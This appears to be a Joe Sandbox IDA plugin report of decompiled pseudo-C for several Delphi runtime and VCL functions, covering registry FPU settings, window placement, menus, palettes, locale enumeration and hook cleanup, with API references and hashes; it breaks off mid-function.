Instruction ID: 074f9ba7fe3f2bce352827ca45e0e156a12b79bd37435d9e55f30b1246493f5b
Opcode Fuzzy Hash: da5d096b80c2e3719e5c063d7e7f99ff6ec0d95e6f91ffa7921161fc8be4518e
Instruction Fuzzy Hash: 78217CB0A84348EEE712DBA8C856BAEB7F8EB05300F5185A4E504D72D1D77C9D90CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007030DC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E007030DC() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x76c020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x76c020; // 0x27f
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x76c020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E0070314D);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x703154);
					return RegCloseKey(_v8);
				}
			}

0x007030dd
0x007030df
0x007030e9
0x00703105
0x00703154
0x00703166
0x00703169
0x00703172
0x00703107
0x00703109
0x0070310a
0x0070310f
0x00703112
0x00703115
0x00703131
0x00703138
0x0070313b
0x0070313e
0x0070314c
0x0070314c

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 007030FE
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0070314D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00703131
RegCloseKey.ADVAPI32(?,00703154,00000000,?,00000004,00000000,0070314D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00703147

Strings

FPUMaskValue, xrefs: 00703128
SOFTWARE\Borland\Delphi\RTL, xrefs: 007030F4

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 01592294d959cdfafb85e84a41173733b7fec04673162710be5e00e05db9098f
Instruction ID: 07a413150bcc03ad9cbcafd5ccd8403736fb053e208be80768109f20834fc16b
Opcode Fuzzy Hash: 01592294d959cdfafb85e84a41173733b7fec04673162710be5e00e05db9098f
Instruction Fuzzy Hash: F0015279A4474CF9DB11DBA09C52BB9B7ECEB0CB00F500261FA04D65C0E6785A10C658

Uniqueness

Uniqueness Score: -1.00%

Function 00727170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00727170(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t7;
				signed int _t18;
				intOrPtr _t20;
				struct HWND__* _t22;

				_t18 = _a8;
				_t22 = _a4;
				if( *0x76f91d != 0) {
					_t7 = _t18 & 0x00000003;
					if(_t7 == 0) {
						_push(_t22);
						L00706A50();
						if(_t7 == 0) {
							GetWindowRect(_t22,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t22,  &_v48);
						}
						return E007270E0( &(_v48.rcNormalPosition), _t18);
					}
					return 0x12340042;
				}
				_t20 =  *0x76f8f8; // 0x727170
				 *0x76f8f8 = E00726F70(1, _t18, _t20, __edi, _t22);
				return  *0x76f8f8(_t22, _t18);
			}

0x00727178
0x0072717b
0x00727185
0x007271aa
0x007271af
0x007271b8
0x007271b9
0x007271c0
0x007271d3
0x007271c2
0x007271c7
0x007271c7
0x00000000
0x007271dd
0x00000000
0x007271b1
0x0072718c
0x00727199
0x00000000

Strings

MonitorFromWindow, xrefs: 00727187
pqr, xrefs: 0072718C, 00727199, 007271A0

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: AddressProc
String ID: MonitorFromWindow$pqr
API String ID: 190572456-1379931791
Opcode ID: a9e0a2136a06482a5d339ccb6a13c5a40cc19d5c01d889b6380bdabe0b0ab130
Instruction ID: 3b848d76153aa02cfba2cff0608a2879bf3cbcb5d270218cdb1d7a6de4cd18f3
Opcode Fuzzy Hash: a9e0a2136a06482a5d339ccb6a13c5a40cc19d5c01d889b6380bdabe0b0ab130
Instruction Fuzzy Hash: CA01AD7150922DAB8704EB54BD869AF73ACEF41350B648166F82193241DB2C9E20C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 007316F4 Relevance: 7.7, APIs: 5, Instructions: 171
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E007316F4(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t202 = _t203;
				_push(__ecx);
				_v8 = __eax;
				L007498E4(_v8);
				_push(_t203);
				_push(0x73194a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x76f665; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E00749040(_v8, 0, __ecx, __edx, _t204);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E00746348(_v8, _t98, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E0074638C(_v8, _t100, _t214);
					}
					_t180 =  *0x731958; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E00730D54(_v8, 1, 1);
						E0074CAA4(_v8, 1, 1, _t215);
					}
					L00747A98(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x731951);
					return L007498EC(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x76fb20; // 0x23f1458
						_t22 = _t194 + 0x40; // 0x60
						if( *(_v8 + 0x25c) !=  *_t22) {
							_t155 =  *0x76fb20; // 0x23f1458
							_t25 = _t155 + 0x40; // 0x60
							E0072010C( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00720104( *((intOrPtr*)(_v8 + 0x68))),  *_t25,  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x76fb20; // 0x23f1458
					_t28 = _t117 + 0x40; // 0x60
					 *(_v8 + 0x25c) =  *_t28;
					_t199 = L00731A7C(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E00730D54(_v8, _t122, _t199);
						E0074CAA4(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

0x007316f4
0x007316f5
0x007316f7
0x007316fc
0x00731702
0x00731709
0x0073170a
0x0073170f
0x00731712
0x0073171a
0x00731725
0x00731730
0x00731736
0x00731738
0x00731742
0x0073174d
0x0073175c
0x007318be
0x007318c1
0x007318c7
0x007318c9
0x007318d0
0x007318d0
0x007318d8
0x007318de
0x007318e0
0x007318e7
0x007318e7
0x007318ef
0x007318f5
0x007318fb
0x007318fd
0x0073190c
0x0073191e
0x0073191e
0x0073192f
0x00731936
0x00731939
0x0073193c
0x00731949
0x00731772
0x0073177c
0x00731787
0x0073178d
0x00731790
0x0073179c
0x007317a1
0x007317bc
0x007317bc
0x00731790
0x007317c1
0x007317c6
0x007317cc
0x007317da
0x007317df
0x007317e5
0x007317e7
0x007317ed
0x007317f6
0x00731809
0x00731818
0x00731837
0x00731837
0x00731847
0x00731866
0x00731866
0x00731876
0x00731895
0x007318b8
0x007318b8
0x00731876
0x00000000
0x007317e7

APIs

MulDiv.KERNEL32(00000000,00000060,00000000), ref: 007317B3
MulDiv.KERNEL32(?,00000000,00000000), ref: 0073182F
MulDiv.KERNEL32(?,00000000,00000000), ref: 0073185E
MulDiv.KERNEL32(?,00000000,00000000), ref: 0073188D
MulDiv.KERNEL32(?,00000000,00000000), ref: 007318B0

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4068df9692f0d4c6f6f88d7f41f67585a250aba446e9aad2316df998304fe3f4
Instruction ID: 96016d34377869e04d6cbd22c89543125e24af7a8dfdd51acdb0da9b4d8ee2b0
Opcode Fuzzy Hash: 4068df9692f0d4c6f6f88d7f41f67585a250aba446e9aad2316df998304fe3f4
Instruction Fuzzy Hash: 9971C474B04148EFDB44DBA8C599AADB7F5AF48300F6941F4E808DB362C779AE41DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0073D084 Relevance: 7.6, APIs: 5, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0073D084(int __eax, void* __edx) {
				void* __edi;
				void* __esi;
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t45;
				void* _t47;
				int _t48;
				intOrPtr* _t49;

				_t18 = __eax;
				_t49 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E0073D084(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0073D1B4(__eax, _t45, _t47));
					_t48 = _t18;
					_t40 = _t39 & 0xffffff00 | _t48 == 0x00000000;
					while(_t48 > 0) {
						_t45 = _t48 - 1;
						_t18 = GetMenuState(E0073D1B4(_t49, _t45, _t48), _t45, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0073D1B4(_t49, _t45, _t48), _t45, 0x400);
							_t40 = 1;
						}
						_t48 = _t48 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t49 + 0x64)) != 0) {
							L14:
							E0073CF44(_t49, _t45, _t48);
							L15:
							return  *((intOrPtr*)( *_t49 + 0x3c))();
						}
						_t44 =  *0x73bb98; // 0x73bbe4
						if(E00703400( *((intOrPtr*)(_t49 + 0x70)), _t44) == 0 || GetMenuItemCount(E0073D1B4(_t49, _t45, _t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t49 + 0x34));
							 *(_t49 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}

0x0073d084
0x0073d088
0x0073d08e
0x0073d098
0x0073d09a
0x00000000
0x0073d09a
0x0073d0a3
0x0073d0a8
0x00000000
0x0073d0aa
0x0073d0bc
0x0073d0c1
0x0073d0c5
0x0073d0ca
0x0073d0d3
0x0073d0dd
0x0073d0e4
0x0073d0f4
0x0073d0f9
0x0073d0f9
0x0073d0fb
0x0073d0fc
0x0073d102
0x0073d108
0x0073d13d
0x0073d13f
0x0073d144
0x00000000
0x0073d14a
0x0073d10d
0x0073d11a
0x00000000
0x0073d12d
0x0073d131
0x0073d138
0x00000000
0x0073d138
0x0073d11a
0x0073d102
0x0073d151

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c35870be57108ef0f7403ce5b6fafb0f66f3ac5847b7bd1b9ef545919c9f07e5
Instruction ID: edad73f9693a3c98a607ad443b4b80a089900d94b221b27df27116910cacef72
Opcode Fuzzy Hash: c35870be57108ef0f7403ce5b6fafb0f66f3ac5847b7bd1b9ef545919c9f07e5
Instruction Fuzzy Hash: B6118EB170125DDBFB30AA39AD0DB5A36A85F81B88F164128BD41DB283DB6DDC068790

Uniqueness

Uniqueness Score: -1.00%

Function 0072539C Relevance: 7.6, APIs: 5, Instructions: 66
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0072539C(struct HPALETTE__* __eax) {
				struct HPALETTE__* _t21;
				char _t28;
				signed int _t30;
				struct HPALETTE__* _t36;
				struct HPALETTE__* _t37;
				struct HDC__* _t38;
				intOrPtr _t39;

				_t21 = __eax;
				_t36 = __eax;
				_t39 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t39 + 0x14));
					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
						L00723D10(_t22);
					}
					_t21 = E00721864( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
					_t37 = _t21;
					 *(_t39 + 0x10) = _t37;
					if(_t37 == 0) {
						_push(0);
						L007068E8();
						_t21 = E00721174(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) {
							L9:
							_t28 = 1;
						} else {
							_push(0xc);
							_push(_t38);
							L00706630();
							_push(0xe);
							_push(_t38);
							L00706630();
							_t30 = _t21 * _t21;
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
							if(_t30 < _t21) {
								goto L9;
							} else {
								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L00706B28();
						if( *(_t39 + 0x10) == 0) {
							 *((char*)(_t36 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}

0x0072539c
0x007253a0
0x007253a2
0x007253a9
0x007253c3
0x007253c9
0x007253cb
0x007253cb
0x007253e2
0x007253e7
0x007253e9
0x007253ee
0x007253f0
0x007253f2
0x007253f7
0x007253fc
0x00725402
0x0072542b
0x0072542b
0x00725404
0x00725404
0x00725406
0x00725407
0x0072540e
0x00725410
0x00725411
0x00725416
0x00725421
0x00725425
0x00000000
0x00725427
0x00725427
0x00725427
0x00725425
0x0072542d
0x00725432
0x00725435
0x0072543a
0x0072543a
0x0072543d
0x0072543e
0x00725440
0x00725449
0x0072544b
0x00000000
0x0072544b
0x00725449
0x007253ee
0x00725453

APIs

7378AC50.USER32(00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 007253F2
7378AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725407
7378AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725411
CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725435
7378B380.USER32(00000000,00000000,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725440

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: 7378$B380CreateHalftonePalette
String ID:
API String ID: 2666310534-0
Opcode ID: acae64d93c69d4f579c4e5cee771769023839340d76377000ce6735ad1740363
Instruction ID: f9e042ebec5d654508d4ad1b7d742003bf176abe46f588549f447b64cda21633
Opcode Fuzzy Hash: acae64d93c69d4f579c4e5cee771769023839340d76377000ce6735ad1740363
Instruction Fuzzy Hash: 421190216416F9EBDB20FF34A849BEE7AD1AF51752F041225F9009A2C1D7BC8CE4C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 007217CC Relevance: 7.6, APIs: 5, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E007217CC(intOrPtr __eax) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff8;
				_v5 = 0;
				if( *0x76f894 == 0) {
					return _v5;
				} else {
					_push(0);
					L007068E8();
					_v12 = __eax;
					_push(_t32);
					_push(0x721852);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68);
					_t14 = _v12;
					_push(_t14);
					L00706630();
					if(_t14 >= 0x10) {
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x76f894; // 0x5e0805c0
						_push(_t18);
						L00706658();
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x76f894; // 0x5e0805c0
						_push(_t21);
						L00706658();
						_v5 = 1;
					}
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x721859);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L00706B28();
					return _t16;
				}
			}

0x007217cd
0x007217cf
0x007217d5
0x007217e0
0x00721860
0x007217e2
0x007217e2
0x007217e4
0x007217e9
0x007217ee
0x007217ef
0x007217f4
0x007217f7
0x007217fa
0x007217fc
0x007217ff
0x00721800
0x00721808
0x0072180d
0x0072180e
0x00721810
0x00721812
0x00721817
0x00721818
0x00721825
0x00721826
0x00721828
0x0072182a
0x0072182f
0x00721830
0x00721835
0x00721835
0x0072183b
0x0072183e
0x00721841
0x00721846
0x00721849
0x0072184a
0x0072184c
0x00721851
0x00721851

APIs

7378AC50.USER32(00000000), ref: 007217E4
7378AD70.GDI32(?,00000068,00000000,00721852,?,00000000), ref: 00721800
7378AEA0.GDI32(5E0805C0,00000000,00000008,?,?,00000068,00000000,00721852,?,00000000), ref: 00721818
7378AEA0.GDI32(5E0805C0,00000008,00000008,?,5E0805C0,00000000,00000008,?,?,00000068,00000000,00721852,?,00000000), ref: 00721830
7378B380.USER32(00000000,?,00721859,00721852,?,00000000), ref: 0072184C

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: 7378$B380
String ID:
API String ID: 817970651-0
Opcode ID: e1a0d00971f83c9e7bc2ffe8ca0322a56074a6f61a0afcfb7ad87e16cdb38137
Instruction ID: d65ba3dd82c649e8fd1b5b130be224cae77dcafece97de6616441ff4e4ea93ed
Opcode Fuzzy Hash: e1a0d00971f83c9e7bc2ffe8ca0322a56074a6f61a0afcfb7ad87e16cdb38137
Instruction Fuzzy Hash: 4A11A571548344FEFB00DFA4AC96B6D77E8F745710F8480A5F5189B5C1DA7A54148720

Uniqueness

Uniqueness Score: -1.00%

Function 0070B3D0 Relevance: 7.6, APIs: 5, Instructions: 50
threadCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0070B3D0(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x70b467);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0070B148(GetThreadLocale(), 0x70b47c, 0x100b,  &_v8);
				_t29 = E007083E8(0x70b47c, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0070B31C, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x76f770;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0070B358, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0070B46E);
				return E00704068( &_v8);
			}

0x0070b3d0
0x0070b3d3
0x0070b3d8
0x0070b3d9
0x0070b3de
0x0070b3e1
0x0070b3f7
0x0070b409
0x0070b413
0x0070b423
0x0070b428
0x0070b42d
0x0070b432
0x0070b432
0x0070b438
0x0070b43b
0x0070b43b
0x0070b44c
0x0070b44c
0x0070b453
0x0070b456
0x0070b459
0x0070b466

APIs

GetThreadLocale.KERNEL32(?,00000000,0070B467,?,?,00000000), ref: 0070B3E8

Part of subcall function 0070B148: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0070B166

GetThreadLocale.KERNEL32(00000000,00000004,00000000,0070B467,?,?,00000000), ref: 0070B418
EnumCalendarInfoA.KERNEL32(Function_0000B31C,00000000,00000000,00000004), ref: 0070B423
GetThreadLocale.KERNEL32(00000000,00000003,00000000,0070B467,?,?,00000000), ref: 0070B441
EnumCalendarInfoA.KERNEL32(Function_0000B358,00000000,00000000,00000003), ref: 0070B44C

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 9270be800a916f4d93f8e2b4be87904f7044183772d05854830ef12e35bf4c32
Instruction ID: e319f86c00134b4a6ca58c0aa70f3a5db1a558c3bd020e20282120b4008c71b4
Opcode Fuzzy Hash: 9270be800a916f4d93f8e2b4be87904f7044183772d05854830ef12e35bf4c32
Instruction Fuzzy Hash: A001D6B1240644EFE711B774CC27B5EB2DCDB86B50FA14770F500A66D2EB6C9F1082A1

Uniqueness

Uniqueness Score: -1.00%

Function 007371C0 Relevance: 7.5, APIs: 5, Instructions: 25
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007371C0() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x76fb34 != 0) {
					_t10 =  *0x76fb34; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x76fb34 = 0;
				if( *0x76fb38 != 0) {
					_t2 =  *0x76fb30; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x76fb2c) {
						_t8 =  *0x76fb38; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x76fb38; // 0x0
					CloseHandle(_t5);
					 *0x76fb38 = 0;
					return 0;
				}
				return 0;
			}

0x007371c7
0x007371c9
0x007371cf
0x007371cf
0x007371d6
0x007371e2
0x007371e4
0x007371ea
0x007371fa
0x007371fe
0x00737204
0x00737204
0x00737209
0x0073720f
0x00737216
0x00000000
0x00737216
0x0073721b

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 007371CF
SetEvent.KERNEL32(00000000,007393BA,00000000,0073925E), ref: 007371EA
GetCurrentThreadId.KERNEL32 ref: 007371EF
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,007393BA,00000000,0073925E), ref: 00737204
CloseHandle.KERNEL32(00000000,00000000,007393BA,00000000,0073925E), ref: 0073720F

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: 3b5ffdcc5262aa1b2299f553e9e51807c58d82dda3f65ac3e1eb10452c3a4709
Instruction ID: 4d4fd294bec7b85642322fc95460b78e11a2075615981f11d5bff8d246ed5d67
Opcode Fuzzy Hash: 3b5ffdcc5262aa1b2299f553e9e51807c58d82dda3f65ac3e1eb10452c3a4709
Instruction Fuzzy Hash: C2F0A5F3589310DAD714FBB8FDA9A1632E8B704311F108A24F51AC35E1D6BCD452CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0070B480 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0070B480(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x70b64a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00704068(__edx);
				E0070B148(GetThreadLocale(), 0x70b660, 0x1009,  &_v12);
				if(E007083E8(0x70b660, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00704328(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x76c11c], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00708AC8(_t124 + _t92 - 1, 2, 0x70b664);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00708AC8(_t124 + _t92 - 1, 4, 0x70b674);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00708AC8(_t124 + _t92 - 1, 2, 0x70b68c);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
